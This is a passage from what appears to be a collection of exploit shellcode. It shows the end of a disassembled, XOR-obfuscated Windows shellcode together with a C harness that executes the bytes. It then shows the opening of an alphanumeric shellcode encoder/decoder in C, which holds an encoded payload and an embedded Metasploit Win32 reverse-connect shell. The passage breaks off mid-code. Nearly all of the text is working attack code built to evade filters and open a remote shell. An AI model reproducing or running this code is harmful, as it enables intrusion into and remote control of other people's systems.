44 1f 2e mov $0x2e1f4437,%ecx 288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx 28d: 31 d1 xor %edx,%ecx 28f: 51 push %ecx 290: b9 34 23 23 3b mov $0x3b232334,%ecx 295: ba 68 77 46 49 mov $0x49467768,%edx 29a: 31 d1 xor %edx,%ecx 29c: 51 push %ecx 29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx 2a2: ba 73 48 65 78 mov $0x78654873,%edx 2a7: 31 d1 xor %edx,%ecx 2a9: 51 push %ecx 2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx 2af: ba 48 6d 37 3d mov $0x3d376d48,%edx 2b4: 31 d1 xor %edx,%ecx 2b6: 51 push %ecx 2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx 2bc: ba 52 6e 43 46 mov $0x46436e52,%edx 2c1: 31 d1 xor %edx,%ecx 2c3: 51 push %ecx 2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx 2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx 2ce: 31 d1 xor %edx,%ecx 2d0: 51 push %ecx 2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx 2d6: ba 58 7a 44 44 mov $0x44447a58,%edx 2db: 31 d1 xor %edx,%ecx 2dd: 51 push %ecx 2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx 2e3: ba 49 62 78 52 mov $0x52786249,%edx 2e8: 31 d1 xor %edx,%ecx 2ea: 51 push %ecx 2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx 2f0: ba 61 31 67 75 mov $0x75673161,%edx 2f5: 31 d1 xor %edx,%ecx 2f7: 51 push %ecx 2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx 2fd: ba 62 64 68 73 mov $0x73686462,%edx 302: 31 d1 xor %edx,%ecx 304: 51 push %ecx 305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx 30a: ba 36 33 78 69 mov $0x69783336,%edx 30f: 31 d1 xor %edx,%ecx 311: 51 push %ecx 312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx 317: ba 31 52 4c 67 mov $0x674c5231,%edx 31c: 31 d1 xor %edx,%ecx 31e: 51 push %ecx 31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx 324: ba 58 49 79 72 mov $0x72794958,%edx 329: 31 d1 xor %edx,%ecx 32b: 51 push %ecx 32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx 331: ba 2d 65 52 6e mov $0x6e52652d,%edx 336: 31 d1 xor %edx,%ecx 338: 51 push %ecx 339: b9 16 10 1f 17 mov $0x171f1016,%ecx 33e: ba 34 58 54 52 mov $0x52545834,%edx 343: 31 d1 xor %edx,%ecx 345: 51 push %ecx 346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx 34b: ba 4e 43 68 4e mov $0x4e68434e,%edx 350: 31 d1 xor %edx,%ecx 352: 51 push %ecx 353: b9 39 22 5e 50 mov $0x505e2239,%ecx 358: ba 4b 47 39 70 mov $0x7039474b,%edx 35d: 31 d1 xor %edx,%ecx 35f: 51 push %ecx 360: 89 e0 mov %esp,%eax 362: bb 41 41 41 01 mov $0x1414141,%ebx 367: c1 eb 08 shr $0x8,%ebx 36a: c1 eb 08 shr $0x8,%ebx 36d: c1 eb 08 shr $0x8,%ebx 370: 53 push %ebx 371: 50 push %eax 372: bb dc 7a a8 23 mov $0x23a87adc,%ebx 377: ba 4d 56 36 55 mov $0x5536564d,%edx 37c: 31 d3 xor %edx,%ebx 37e: ff d3 call *%ebx 380: 31 c0 xor %eax,%eax 382: 50 push %eax 383: b8 41 41 41 65 mov $0x65414141,%eax 388: c1 e8 08 shr $0x8,%eax 38b: c1 e8 08 shr $0x8,%eax 38e: c1 e8 08 shr $0x8,%eax 391: 50 push %eax 392: b9 1e 53 39 3c mov $0x3c39531e,%ecx 397: ba 6d 32 5b 50 mov $0x505b326d,%edx 39c: 31 d1 xor %edx,%ecx 39e: 51 push %ecx 39f: b9 04 66 2f 32 mov $0x322f6604,%ecx 3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx 3a9: 31 d1 xor %edx,%ecx 3ab: 51 push %ecx 3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx 3b1: ba 69 73 62 75 mov $0x75627369,%edx 3b6: 31 d1 xor %edx,%ecx 3b8: 51 push %ecx 3b9: b9 20 41 47 36 mov $0x36474120,%ecx 3be: ba 45 35 67 59 mov $0x59673545,%edx 3c3: 31 d1 xor %edx,%ecx 3c5: 51 push %ecx 3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx 3cb: ba 47 69 44 59 mov $0x59446947,%edx 3d0: 31 d1 xor %edx,%ecx 3d2: 51 push %ecx 3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx 3d8: ba 62 5a 38 43 mov $0x43385a62,%edx 3dd: 31 d1 xor %edx,%ecx 3df: 51 push %ecx 3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx 3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx 3ea: 31 d1 xor %edx,%ecx 3ec: 51 push %ecx 3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx 3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx 3f7: 31 d1 xor %edx,%ecx 3f9: 51 push %ecx 3fa: 89 e0 mov %esp,%eax 3fc: bb 41 41 41 01 mov $0x1414141,%ebx 401: c1 eb 08 shr $0x8,%ebx 404: c1 eb 08 shr $0x8,%ebx 407: c1 eb 08 shr $0x8,%ebx 40a: 53 push %ebx 40b: 50 push %eax 40c: bb dc 7a a8 23 mov $0x23a87adc,%ebx 411: ba 4d 56 36 55 mov $0x5536564d,%edx 416: 31 d3 xor %edx,%ebx 418: ff d3 call *%ebx 41a: 31 c0 xor %eax,%eax 41c: 50 push %eax 41d: b8 41 41 41 6f mov $0x6f414141,%eax 422: c1 e8 08 shr $0x8,%eax 425: c1 e8 08 shr $0x8,%eax 428: c1 e8 08 shr $0x8,%eax 42b: 50 push %eax 42c: b9 72 2a 05 39 mov $0x39052a72,%ecx 431: ba 52 4b 70 4d mov $0x4d704b52,%edx 436: 31 d1 xor %edx,%ecx 438: 51 push %ecx 439: b9 54 3a 05 52 mov $0x52053a54,%ecx 43e: ba 35 48 71 6f mov $0x6f714835,%edx 443: 31 d1 xor %edx,%ecx 445: 51 push %ecx 446: b9 29 16 0a 47 mov $0x470a1629,%ecx 44b: ba 4c 36 79 33 mov $0x3379364c,%edx 450: 31 d1 xor %edx,%ecx 452: 51 push %ecx 453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx 458: ba 55 6d 32 5d mov $0x5d326d55,%edx 45d: 31 d1 xor %edx,%ecx 45f: 51 push %ecx 460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx 465: ba 41 77 48 75 mov $0x75487741,%edx 46a: 31 d1 xor %edx,%ecx 46c: 51 push %ecx 46d: b9 34 79 3a 12 mov $0x123a7934,%ecx 472: ba 53 59 4e 77 mov $0x774e5953,%edx 477: 31 d1 xor %edx,%ecx 479: 51 push %ecx 47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx 47f: ba 72 32 78 41 mov $0x41783272,%edx 484: 31 d1 xor %edx,%ecx 486: 51 push %ecx 487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx 48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx 491: 31 d1 xor %edx,%ecx 493: 51 push %ecx 494: 89 e0 mov %esp,%eax 496: bb 41 41 41 01 mov $0x1414141,%ebx 49b: c1 eb 08 shr $0x8,%ebx 49e: c1 eb 08 shr $0x8,%ebx 4a1: c1 eb 08 shr $0x8,%ebx 4a4: 53 push %ebx 4a5: 50 push %eax 4a6: bb dc 7a a8 23 mov $0x23a87adc,%ebx 4ab: ba 4d 56 36 55 mov $0x5536564d,%edx 4b0: 31 d3 xor %edx,%ebx 4b2: ff d3 call *%ebx 4b4: bb 9b 4f d0 30 mov $0x30d04f9b,%ebx 4b9: ba 63 36 46 46 mov $0x46463663,%edx 4be: 31 d3 xor %edx,%ebx 4c0: ff d3 call *%ebx */ #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\xbb\x9b\x4f\xd0\x30\xba\x63\x36\x46\x46\x31\xd3\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); }
  12. /* ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Alphanumeric Shellcode Encoder Decoder Copyright © 1985-2008 Avri Schneider - Aladdin Knowledge Systems, Inc. All rights reserved. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>. +-----------+ WORKS CITED +-----------+ +--------------------------------------------------------------------------------------------------+ |Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004 | |Encode2Alnum (polymorphic alphanumeric decoder/encoder) | |Full-Disclosure <http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027147.html> | | | |CLET Team. Aug. 2003 | |Polymorphic Shellcode Engine | |Phrack <http://www.phrack.org/show.php?p=61&a=9> | | | |Ionescu, Costin. 1 July 2003 | |Re: GetPC code (was: Shellcode from ASCII) | |Vuln-Dev <http://www.securityfocus.com/archive/82/327348> | | | |rix. Aug. 2001 | |Writing ia32 alphanumeric shellcodes | |Phrack <http://www.phrack.org/show.php?p=57&a=15> | | | |Wever, Berend-Jan. 28 Jan. 2001 | |Alphanumeric GetPC code | |Vuln-Dev <http://www.securityfocus.com/archive/82/351528> | |ALPHA3 <http://skypher.com/wiki/index.php?title=ALPHA3> | +--------------------------------------------------------------------------------------------------+ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// */ #include <time.h> #include <stdio.h> #include <windows.h> #define MAX_BYTES 0x100 #define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack #define MIN_IP_STR_LEN 7 #define MAX_IP_STR_LEN 15 #define OFFSET_XOR_AL1_A 15 #define OFFSET_XOR_AL1_B 18 #define OFFSET_XOR_AL2_A 37 #define OFFSET_XOR_AL2_B 40 #define OFFSET_PUSH_DWORD1 0 #define OFFSET_PUSH_DWORD2 1 #define OFFSET_PUSH_DWORD3 4 #define OFFSET_PUSH_DWORD4 12 #define OFFSET_RANDOMIZED_DECODER_HEAD 14 #define SIZE_RANDOMIZED_DECODER_HEAD 16 BYTE EncodedShellcode[] = // encoded 336 bytes "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO" "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt" "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH" "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq" "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL" "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0" "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px" "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc" "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v" "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD" "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk" "1telLPYuGyNvX1TyJ3yLdOwckr"; // example: make encoder choose more uppercase bytes... #define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ" #define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset // feel free to //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV #define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder//////////// #define _Q(str) #str #define Q(str) _Q(str) #define P(str) #str ##" // <--- buffer offset\n"## _Q(str) /////////////////////////////////// #define CONNECT_BACK_SHELLCODE // //#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------. /////////////////////////////////////////////////////////////////// | int main(); // | UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // | UCHAR get_push_register_instruction(UCHAR *reg); // | UCHAR get_random_alnum_value(); // | UCHAR get_random_alnum_push_dword_opcode(); // | UCHAR *get_nop_slide(UINT size, UINT slide); /////// | UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// | UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // | UCHAR *shuffle(UCHAR str[], UINT length); /////// | DWORD my_htonl(DWORD dw_in); // | DWORD ip_str_to_dw(UCHAR *str); // | BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // | BOOL is_alnum(UCHAR c); // | BOOL str_is_alnum(UCHAR *str); // | UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // | UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // | struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // | struct xor2_key *choose_random_node(struct xor2_key *head); // | void free_p_xor2_key(struct xor2_key *node); // | // | struct xor2_key { // | UCHAR xor2; // | UCHAR key; // | struct xor2_key *prev; // | struct xor2_key *next; // | } xor2_key; // | // | // | // Title: Win32 Reverse Connect // | // Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 // | // Author: hdm[at]metasploit.com // | #ifdef CONNECT_BACK_SHELLCODE // | #define OFFSET_IP_ADDRESS 154 // | #define OFFSET_TCP_PORT_NUMBER 159 // | #define IP_ADDRESS "127.0.0.1" // | #define TCP_PORT_NUMBER 123 // | DWORD ip_address; // | UCHAR shellcode[] = // | "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" // | "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" // | "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" // | "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" // | "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" // | "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" // | "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" // | "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" // | "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" // | "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68" // | "IPIP" // I.P. address // | "\x68" // | "PORT" // TCP port number // | "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24" // | "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d" // | "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10" // | "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55" // | "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55" // | "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b" // | "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49" // | "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1" // | "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01" // | "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb" // | "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; // | #else ////////////////////////////////////// | UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------' #endif // DWORD size = sizeof(shellcode)-1; // // int main() { ///////////////////////////////////////////////////////// //(decoder address is in ecx when decoder starts) // UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------. // // | #define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode // | UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE}; //////////////////////////////////////////////// | UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time | UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time | int offset_imul_key = '\xC1';//////////////////////// | int jne_xor1 = '\xC2';// >---------------------------------------------------------. | int jne_xor2 = '\xC3';// >--------------------------------------------------------------| | // you would need to play with these two values if you want to reduce | | // the size of the NOP slides - they obviously need to stay alnum. | | // You could also play with the value of AL before the XOR is done | | // to get your desired negative offset. keep in mind that it will cost | | // you instructions to get al to the value you want (if you use xor of | | // two alphanumeric bytes, you would need to push first alphanumeric | | // char to the stack, pop eax, then xor it with it's alnum complement) | | // This playing around would result in an even harder to detect decoder | | // as the offsets would be different | | int size_decoder ='\xC4'; // | | int half_size_decoder ='\xC5'; //////////////////////////////////////////////////////////////////// | | UCHAR imul_instruction_1 ='\x6B'; // | | UCHAR imul_instruction_2 ='\x41'; // | | UCHAR imul_instruction_3 ='\xC6'; //size of decoder+1 // | | UCHAR imul_instruction_4 ='\xC7'; //initial key (random alnum) // | | // // | | UINT column=0, i=0; /////////////////////////////// | | UCHAR *alnum = ALNUM_CHARSET; // | | UCHAR *p_alnum = alnum; // | | UCHAR decoder[] = // | | { //////////////////////////////////////////////////////////////////////////////// | | // | | //[step_1] -- multiply first encoded byte with key | | //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte | | // | | // Each binary byte is encoded into three alphanumeric bytes. | | // The first byte multipled by the third byte xor'ed against the second byte yeilds the original | | // binary byte. | | // | | // TODO: | | // .--(first byte ^ second byte) * third byte | | // '--(second byte ^ first byte) * third byte | | // | | // .--(first byte ^ third byte) * second byte | | // '--(third byte ^ first byte) * second byte | | // | | // .--(second byte ^ third byte) * first byte | | // '--(third byte ^ second byte) * first byte | | // | | // .--(first byte * second byte) ^ third byte | | // '--(second byte * first byte) ^ third byte | | // | | // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented | | // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder) | | // | | // .--(second byte * third byte) ^ first byte | | // '--(third byte * second byte) ^ first byte | | // | | // | | // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets, | | // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the | | // same encoder. | | // | | /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---. /* 1*/ '\x50', //push ??? (this can change) // [eax = address of decoder]------+ | | | /* 2*/ '\x50', //push ??? (this can change) // [ecx = address of decoder]------+ | | | /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (decoder address) // [edx = address of decoder]------+ | | | /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (base offset for cmp) // [ebx = address of decoder]------+ | | | /* 5*/ '\x50', //push ??? (this can change) // [esp = address of decoder]------+ | | | /* 7*/ '\x6A', half_size_decoder, //push 35h (word offset for cmp) // [ebp = decoder size / 2]--------+ | | | /*12*/ '\x68', END_OF_ENCODED_SHELLCODE, //push END_OF_ENCODED_SHELLCODE // [esi = 4 bytes terminating key]>+ | | | /*13*/ '\x50', //push ??? (this can change) // [edi = address of decoder]------+ | | | /*14*/ '\x61', //popad // [set all registers] <-----------' | | | /*16*/ '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----. | | | /*17*/ '\x58', //pop eax <-------------------------------------------------' | | | /*19*/ '\x34', xor_al1, //xor al,XOR_AL1 [al = 0x00] | | | /*20*/ '\x48', //dec eax [al = 0xFF] [you can play with AL here...]<----' | | /*22*/ '\x34', jne_xor1, //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1] | | /*25*/ '\x30', '\x42', size_decoder-1, //xor byte ptr [edx+size],al >--change-last-byte--. | | /*26*/ '\x52', //push edx [save decoder address on stack] | | | 